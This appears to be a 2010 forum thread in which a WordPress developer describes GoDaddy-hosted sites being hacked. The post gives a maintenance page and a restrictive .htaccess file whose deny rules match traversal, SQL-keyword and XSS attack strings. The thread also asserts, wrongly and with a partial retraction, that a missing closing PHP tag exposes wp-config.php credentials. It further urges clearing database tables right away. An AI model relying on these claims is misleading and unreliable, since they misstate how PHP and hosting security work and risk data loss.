hackerssuck

Instead of posting my final GoDaddy security vulnerabilites info here I’ll post it on my site since this is primarily a GoDaddy security issue not a WordPress security issue. thanks sambell for pointing out the wp-config.php correct info. I wasn’t 100% sure about that closing tag statement I made and I should have double checked before posting that info. ??

I agree with you 100% sambell. It has nothing to do with WordPress at all really. WordPress is very, very, very secure and I have rarely had to “fix” a hacked WordPress site on other hosts. Unless the client has made the mistake and opened the door(s) themselves. Was totally kidding of course about the asking you if your were a hacker – that was a joke – i didn’t make that absolutely clear that i was just joking with you. ?? I am finding all sorts of other security vulnerabilites with default godaddy files and obviously hackers know this and are hovering like vultures waiting for their next meal. I also wanted to point out that i used the godaddy application installer to install WordPress – I did not do a clean install of WP. Yeah i know I am asking for it by using their prebundled WordPress package. ??

The other thing i wanted to mention is that the client also had an HTML site with a body onload that was not filtered and that site was also XSS hacked.

Hmm ok maybe I’m not exactly correct in stating that the closing tag is absolutely necessary, but i have always seen it in all other hosts wp-confi.php files. You wouldn’t be a hacker by any chance would you? ?? What i do know for sure is that i installed WordPress on GoDaddy and within hours it was hacked. I installed WordPress on another totally new godaddy account and within hours it was hacked. What i also know for sure is that my .htaccess file is a smack down for these amateurs. DENIED DENIED DENIED DENIED. ??

CORRECTION:
you will not be able to install and activate ONLY new installed plugins. You can deactivate and reactivate all of your existing installed plugins.

I am a professional WordPress Developer. I have a client that was being hacked almost immediately after installing WordPress on GoDaddy. The WordPress installation right from the get go has a huge problem. The wp-config.php file in the GoDaddy WordPress installation package is exposed because it does not have the closing tag ?> at the end. This means that your SQL DB username and password can be grabbed. I am finding several other security vulnerabilites and am still in the process of isolating all of them. I have been successful at completely blocking the hackers by adding this .htaccess file below until i am completely done plugging all the holes. I would advise anyone who has WordPress installed on GoDaddy to add this .htaccess code to their website immediately. I have notified GoDaddy yesterday 2-13-2010, but i am not going to wait around for them to act and take care of this. Some of the hacks that occurred to this client. XSS hidden iframe injection, XSS injected code throughout the site affecting all critical .js files, backdoors set up everywhere, the /stats folder on godaddy has a huge security vulnerability – the primary host account password can be grabbed, there are several other security vulnerabilities that i am finding and will add a full detailed report once i have that info. For now like i said i am successfully blocking the hackers with this very restrictive .htaccess file. it will actually block you from activating plugins in your admin panel. this is an temporary inconvenience of course, but for now it is absolutely necessary for ABSOLUTE LOCKDOWN of your website. Everything else is fine ie your website is funtional and viewable by the world and can be indexed by search engines without any problems. Until i am 100% sure that i have discovered every single security vulnerability i am not giving these pricks a shot. And they have been trying now for 2 days. Since they are no longer able to clean their tracks from the logs i am watching the logs fill up with failed attempts after failed attempts at hacking this site.
I recommend you first create a maintenance mode php script and .htaccess file for your website so that if my very restrictive .htaccess file does not allow your site to fully function properly you can just have your site display that is being worked on and under maintenance (503 status code) until you can fix everything. Once again i will post a full description of all godaddy security vulnerabilities and fixes here later once i have completed all of my investigations. This is a 503 error status that you will not be penalized for by search engines.
create a php file called maintenanceXXXXX.php (add something unique to replace the XXXXX’s) from this code

<?php
header('HTTP/1.1 503 Service Temporarily Unavailable',true,503);
header('Status: 503 Service Temporarily Unavailable');
header('Retry-After: 172800');
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"https://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta name="robots" content="noindex,nofollow">
<title>503 - Temporarily Closed For Maintenance</title>
<style type="text/css">
<!--
p
{
    font-family: "Verdana", sans-serif;
}
-->
</style>
</head>
<body>

<p><b>Natural Herbal Remedies</b></p>
<p>is temporarily closed for maintenance.</p>
<p>Normal operation will resume as soon as possible.</p>

</body>
</html>

the maintenance mode 503 .htaccess file code

RewriteEngine On
RewriteBase /
# When enabled, the next code line allows testing.
# It says only do the rewrite if the request is from YOUR IP address.
# Thus, you can close the site only to YOURSELF to make sure it works,
# then comment out the line again to close the site to everyone.
# Set it to your actual IP address at the time of the test.
RewriteCond %{REMOTE_ADDR} ^000\.000\.000\.000$

# The remaining two code lines close the site. They say:
# if the request is NOT for /maintenance.php, send /maintenance.php instead.
# You MUST allow at least one file to be served without rewriting it,
# (maintenance.php in this example), to prevent endless looping.
RewriteCond %{REQUEST_URI} !^/maintenance\.php$
# To allow another file, copy the line above to here and change the filename.

# This line says: no matter what file was requested, serve maintenance.php.
# This is a rewrite (not a redirect), so we use the local file path, no https://
RewriteRule ^(.*)$ /maintenanceXXXX.php [L]

ok now for the very restrictive .htaccess file

setenv PHPVERSION 5

### Turning on the RewriteEngine ####
RewriteEngine on
RewriteBase /
ServerSignature Off

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

# FILTER REQUEST METHODS
<IfModule mod_rewrite.c>
RewriteCond %{REQUEST_METHOD} ^(TRACE|DELETE|TRACK) [NC]
RewriteRule ^(.*)$ - [F,L]
</IfModule>

# QUERY STRING EXPLOITS
<IfModule mod_rewrite.c>
RewriteCond %{QUERY_STRING} \.\.\/ [NC,OR]
RewriteCond %{QUERY_STRING} boot\.ini [NC,OR]
RewriteCond %{QUERY_STRING} tag\= [NC,OR]
RewriteCond %{QUERY_STRING} ftp\:  [NC,OR]
RewriteCond %{QUERY_STRING} http\:  [NC,OR]
RewriteCond %{QUERY_STRING} https\:  [NC,OR]
RewriteCond %{QUERY_STRING} mosConfig [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(\[|\]|\(|\)|<|>|’|"|;|\?|\*).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*("|'|<|>|\|{||).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(%0|%A|%B|%C|%D|%E|%F|127\.0).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(globals|encode|localhost|loopback).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(request|select|insert|union|declare|drop).* [NC]
RewriteRule ^(.*)$ - [F,L]
</IfModule>

This .htaccess file is so restrictive it will also block you as an admin from activating plugins, but i have been monitoring a hacker for days trying every possible XSS attack string and i see nothing but denied, not allowed, etc. messages in the website error log.

once again i will post a more detailed godaddy wordpress security report once i have completed all of my findings. i am currently looking at the webformmailer.php file that is installed on all godaddy accounts by default – it appears that it is being exploited. You may want to temporarily disable it. gdform.php so far appears to be ok. I recommend that you immediately check your MySQL on your godaddy account and look for any databases that you did not create. clear all of the tables immediately. the db i found was called __piggy. More complete info on this will be posted tomorrow or latest tuesday. Slam the doors on these dirt bags. Good luck to all.